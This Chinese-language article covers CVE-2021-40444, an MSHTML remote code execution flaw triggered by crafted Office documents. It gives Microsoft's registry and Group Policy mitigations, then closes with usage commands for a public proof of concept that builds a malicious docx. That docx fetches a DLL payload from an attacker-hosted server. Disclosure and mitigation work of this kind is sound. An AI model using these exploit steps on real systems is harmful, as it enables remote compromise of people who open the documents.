[[425270]]

漏洞描述

　　Microsoft 正在調(diào)查 MSHTML 中一個(gè)影響 Microsoft Windows 的遠(yuǎn)程代碼執(zhí)行漏洞的報(bào)告。Microsoft 發(fā)現(xiàn)，存在嘗試通過(guò)特別設(shè)計(jì)的 Microsoft Office 文檔利用此漏洞的針對(duì)性攻擊。

　　攻擊者可制作一個(gè)由托管瀏覽器呈現(xiàn)引擎的 Microsoft Office 文檔使用的惡意 ActiveX 控件。然后，攻擊者必須誘使用戶打開(kāi)此惡意文件。在系統(tǒng)上配置為具有較少用戶權(quán)限的用戶帳戶比具有管理員權(quán)限的用戶帳戶所受影響要小。

　　Microsoft Defender 防病毒和 Microsoft Defender for Endpoint 均提供檢測(cè)和防范已知漏洞的功能。客戶應(yīng)將反惡意軟件產(chǎn)品保持最新?tīng)顟B(tài)。使用自動(dòng)更新的客戶不需要采取其他措施。管理更新的企業(yè)客戶應(yīng)當(dāng)選擇檢測(cè)版本 1.349.22.0 或更新版本，以將其部署于整個(gè)用戶環(huán)境中。Microsoft Defender for Endpoint 警報(bào)將顯示為：“Suspicious Cpl File Execution”。

　　完成此調(diào)查后，Microsoft 將采取有助于保護(hù)客戶的適當(dāng)措施。這可能包括，通過(guò)月度發(fā)布流程提供安全更新程序，或根據(jù)客戶需求不定期提供安全更新程序。

　　請(qǐng)參閱緩解措施和解決方法部分，以了解有關(guān)保護(hù)您的系統(tǒng)免受此漏洞影響之措施的重要信息。

　　更新 2021 年 9 月 14 日：Microsoft 已發(fā)布安全更新來(lái)解決此漏洞。有關(guān)適用于您系統(tǒng)的更新，請(qǐng)參閱“安全更新”表。我們建議您立即安裝這些更新。請(qǐng)參閱常見(jiàn)問(wèn)題解答，以了解適用于您系統(tǒng)的重要信息。

　　解決辦法

　　在 Internet Explorer 中禁用所有 ActiveX 控件可以緩解這種攻擊。這可以通過(guò)使用“本地組策略編輯器”配置組策略或更新注冊(cè)表在所有站點(diǎn)中實(shí)現(xiàn)。之前安裝的 ActiveX 控件將繼續(xù)運(yùn)行，但是不會(huì)受此漏洞的影響。

　　如需通過(guò)組策略禁用 ActiveX 控件。

　　在組策略設(shè)置中，導(dǎo)航到計(jì)算機(jī)配置 > 管理模板 > Windows 組件 > Internet Explorer > Internet 控制面板 > 安全頁(yè)面

　　對(duì)于每個(gè)區(qū)域：

1. 選擇區(qū)域（Internet 區(qū)域、Intranet 區(qū)域、本地計(jì)算機(jī)區(qū)域或受信任的站點(diǎn)區(qū)域）。
2. 雙擊下載簽名的 ActiveX 控件并啟用政策。然后將政策中的選項(xiàng)設(shè)置為停用。
3. 雙擊下載未簽名的 ActiveX 控件并啟用政策。然后將政策中的選項(xiàng)設(shè)置為停用。

　　我們建議將此設(shè)置應(yīng)用至所有區(qū)域，以充分保護(hù)您的系統(tǒng)。

　　變通辦法的影響。

　　這可將所有 64 位和 32 位進(jìn)程的 Internet 區(qū)域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 設(shè)置為禁用 (3)。 新的 ActiveX 控件將不會(huì)安裝。之前安裝的 ActiveX 控件將繼續(xù)運(yùn)行。

　　如需在單個(gè)系統(tǒng)中通過(guò) RegKey 禁用 ActiveX 控件：

　　警告如果您不正確地使用注冊(cè)表編輯器，則可能會(huì)導(dǎo)致嚴(yán)重問(wèn)題（您或許需要重新安裝操作系統(tǒng)）。Microsoft 不保證您可以解決因錯(cuò)誤使用注冊(cè)表編輯器而產(chǎn)生的問(wèn)題。使用注冊(cè)表編輯器的風(fēng)險(xiǎn)由您自己承擔(dān)。

1. 如需在所有區(qū)域的 Internet Explorer 中禁用安裝 ActiveX 控件，將以下內(nèi)容粘貼到文本文件中，并使用 .reg 文件擴(kuò)展名進(jìn)行保存：

Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]"1001"=dword:00000003"1004"=dword:00000003 

2. 雙擊 .reg 文件將其應(yīng)用到您的策略配置單元中。
3. 重新啟動(dòng)系統(tǒng)，以確保應(yīng)用新配置。

　　變通辦法的影響。

　　這可將所有 64 位和 32 位進(jìn)程的 Internet 區(qū)域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 設(shè)置為禁用 (3)。 新的 ActiveX 控件將不會(huì)安裝。之前安裝的 ActiveX 控件將繼續(xù)運(yùn)行。

　　如何撤消變通辦法

　　刪除之前在實(shí)施變通辦法過(guò)程中添加的注冊(cè)表項(xiàng)。

　　如需在 Windows Explorer 中禁用預(yù)覽

　　禁用 Shell Preview 可防止用戶在 Windows Explorer 中預(yù)覽文檔。針對(duì)您想防止預(yù)覽的各類文檔，請(qǐng)執(zhí)行以下步驟：

1. 在注冊(cè)表編輯器中，導(dǎo)航至合適的注冊(cè)表項(xiàng)：

　　對(duì)于 Word 文檔：

HKEY_CLASSES_ROOT.docx\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.doc\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.docm\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 

　　對(duì)于多格式文本文件：

HKEY_CLASSES_ROOT.rtf\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 

2. 導(dǎo)出 RegKey 的副本以備份。
3. 雙擊名稱并在編輯字符串對(duì)話框中，刪除“數(shù)值數(shù)據(jù)”。
4. 單擊確定。

　　變通辦法的影響

　　用戶將無(wú)法在 Windows Explorer 中預(yù)覽文檔。

　　如何撤消變通辦法

　　雙擊您在變通辦法步驟二中創(chuàng)建的 .reg 文件。

　　常見(jiàn)問(wèn)題解答

　　“安全更新”表中列有適用于 Windows 8.1、Windows Server 2012 R2 和 Windows Server 2012 的三類更新。我需要在我的系統(tǒng)中安裝什么更新來(lái)免受此漏洞的影響？

　　運(yùn)行 Windows 8.1、Windows Server 2012 R2 或 Windows Server 2012 的客戶可應(yīng)用下列選項(xiàng)之一：月度匯總或僅安全更新和 IE 累積更新。

　　我運(yùn)行的是 Windows 7、Windows Server 2008 R2 或 Windows Server 2008。我需要應(yīng)用月度匯總和 IE 累積更新嗎？

• Windows 7、Windows Server 2008 R2 和 Windows Server 2008 的月度匯總中包含此漏洞的更新。應(yīng)用月度匯總的客戶無(wú)需再應(yīng)用 IE 累積更新。
• 只應(yīng)用僅安全更新的客戶還需要應(yīng)用 IE 累積更新，以免受此漏洞的影響。

　　CVE-2021-40444 PoC

　　項(xiàng)目地址:

　　GitHub: github.com/lockedbyte/CVE-2021-40444

　　CVE-2021-40444（Microsoft Office Word 遠(yuǎn)程代碼執(zhí)行）惡意 docx 生成器利用工具 .

　　此腳本的創(chuàng)建基于對(duì)野外使用的示例的一些逆向工程：

938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52（docx 文件）

　　你需要先安裝 lcab ( sudo apt-get install lcab)

sudo apt-get install lcab 

　　檢查REPRODUCE.md手動(dòng)復(fù)制步驟

　　如果您生成的 cab 不起作用，請(qǐng)嘗試將 exploit.html URL 指向 calc.cab

　　使用方法

　　首先生成一個(gè)給定 DLL 的惡意 docx 文檔，您可以使用從調(diào)用中test/calc.dll彈出 a 的那個(gè)calc.exesystem ()

python3 exploit.py generate test/calc.dll http://<SRV IP> 

　　生成惡意 docx（將位于out/）后，您可以設(shè)置服務(wù)器：

sudo python3 exploit.py host 80

　　最后在 Windows 虛擬機(jī)中嘗試 docx：打開(kāi) word 成功彈出計(jì)算器.

　　poc 下載地址:

　　https://github.com/lockedbyte/CVE-2021-40444